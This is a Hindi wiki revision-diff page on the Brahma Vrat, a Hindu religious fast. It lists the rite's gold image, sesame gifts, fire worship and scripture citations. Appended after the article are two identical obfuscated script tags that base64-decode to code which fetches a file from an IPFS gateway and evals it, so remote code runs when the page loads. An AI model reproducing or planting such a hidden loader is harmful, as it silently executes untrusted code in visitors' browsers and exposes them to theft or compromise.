Difference between revisions of "ब्रह्म व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*किसी भी शुभ दिन; यह प्रकीर्णन है; ब्रह्माण्ड की एक स्वर्ण प्रतिमा; तीन दिनों तक तिल का दान; अग्नि की पूजा तथा किसी गृहस्थ एवं उसकी पत्नी को प्रतिमा एवं तिल का दान;  
 
*किसी भी शुभ दिन; यह प्रकीर्णन है; ब्रह्माण्ड की एक स्वर्ण प्रतिमा; तीन दिनों तक तिल का दान; अग्नि की पूजा तथा किसी गृहस्थ एवं उसकी पत्नी को प्रतिमा एवं तिल का दान;  
*कर्ता ब्रह्मलोक में पहुँच जाता है और पुनः जन्म नहीं लेता है। <ref>कृत्यकल्पतरु (व्रत0, 445-446, 27वाँ षष्टिव्रत)</ref> <ref>हेमाद्रि (व्रत0 2, 886, पद्मपुराण से उद्धरण)</ref>। <ref>मत्स्यपुराण (101-46-48)</ref>;  
+
*कर्ता [[ब्रह्मलोक]] में पहुँच जाता है और पुनः जन्म नहीं लेता है। <ref>कृत्यकल्पतरु (व्रत0, 445-446, 27वाँ षष्टिव्रत)</ref> <ref>हेमाद्रि (व्रत0 2, 886, पद्मपुराण से उद्धरण)</ref>। <ref>मत्स्यपुराण (101-46-48)</ref>;  
 
*[[द्वितीया]] को ब्रह्मचारी (वैदिक छात्र) का भोजन से सम्मान; ब्रह्म प्रतिमा का निर्माण उसे [[कमल]] दल पर रखकर गंध आदि से पूजा की जाती हैं।  
 
*[[द्वितीया]] को ब्रह्मचारी (वैदिक छात्र) का भोजन से सम्मान; ब्रह्म प्रतिमा का निर्माण उसे [[कमल]] दल पर रखकर गंध आदि से पूजा की जाती हैं।  
 
*घी एवं समिधा से होम करना चाहिए <ref>हेमाद्रि (व्रत0 1, 377, भविष्योत्तरपुराण से उद्धरण)</ref>।  
 
*घी एवं समिधा से होम करना चाहिए <ref>हेमाद्रि (व्रत0 1, 377, भविष्योत्तरपुराण से उद्धरण)</ref>।  

Revision as of 06:23, 30 October 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • kisi bhi shubh din; yah prakirnan hai; brahmand ki ek svarn pratima; tin dinoan tak til ka dan; agni ki pooja tatha kisi grihasth evan usaki patni ko pratima evan til ka dan;
  • karta brahmalok mean pahuanch jata hai aur punah janm nahian leta hai. [1] [2]. [3];
  • dvitiya ko brahmachari (vaidik chhatr) ka bhojan se samman; brahm pratima ka nirman use kamal dal par rakhakar gandh adi se pooja ki jati haian.
  • ghi evan samidha se hom karana chahie [4].

 


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. krityakalpataru (vrat0, 445-446, 27vaan shashtivrat)
  2. hemadri (vrat0 2, 886, padmapuran se uddharan)
  3. matsyapuran (101-46-48)
  4. hemadri (vrat0 1, 377, bhavishyottarapuran se uddharan)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>